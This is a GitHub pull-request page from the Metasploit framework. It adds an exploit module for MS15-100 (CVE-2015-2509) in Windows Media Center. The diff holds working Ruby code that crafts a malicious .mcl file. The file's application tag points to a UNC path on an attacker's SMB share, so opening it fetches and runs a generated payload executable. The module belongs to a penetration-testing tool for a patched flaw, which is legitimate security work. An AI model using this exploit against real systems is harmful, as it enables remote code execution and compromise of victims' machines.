Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add MS15-100 Microsoft Windows Media Center MCL Vulnerability #5971

Merged
merged 2 commits into from
Sep 13, 2015
Merged

Add MS15-100 Microsoft Windows Media Center MCL Vulnerability #5971

Changes from all commits
Commits
Show all changes
2 commits
Select commit Hold shift + click to select a range
0105309
Add MS15-100 Microsoft Windows Media Center MCL Vulnerability
wchen-r7 Sep 11, 2015
ae5aa8f
No FILE_CONTENTS option
wchen-r7 Sep 13, 2015
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
72 changes: 72 additions & 0 deletions modules/exploits/windows/fileformat/ms15_100_mcl_exe.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,72 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE
include Msf::Exploit::Remote::SMB::Server::Share

def initialize(info={})
super(update_info(info,
'Name' => "MS15-100 Microsoft Windows Media Center MCL Vulnerability",
'Description' => %q{
This module exploits a vulnerability in Windows Media Center. By supplying
an UNC path in the *.mcl file, a remote file will be automatically downloaded,
which can result in arbitrary code execution.
},
'License' => MSF_LICENSE,
'Author' =>
[
'sinn3r',
],
'References' =>
[
['CVE', '2015-2509'],
['MSB', 'MS15-100']
],
'Payload' =>
{
'DisableNops' => true
},
'DefaultOptions' =>
{
'DisablePayloadHandler' => 'false'
},
'Platform' => 'win',
'Targets' =>
[
['Windows', {}],
],
'Privileged' => false,
'DisclosureDate' => "Sep 8 2015",
'DefaultTarget' => 0))

register_options(
[
OptString.new('FILENAME', [true, 'The MCL file', 'msf.mcl']),
OptString.new('FILE_NAME', [ false, 'The name of the malicious payload to execute', 'msf.exe'])
], self.class)

deregister_options('FILE_CONTENTS')
end

def generate_mcl
%Q|<application run="#{unc}" />|
end

def primer
self.file_contents = generate_payload_exe
print_status("Malicious executable at #{unc}...")

print_status("Creating '#{datastore['FILENAME']}' file ...")
mcl = generate_mcl
file_create(mcl)
end

end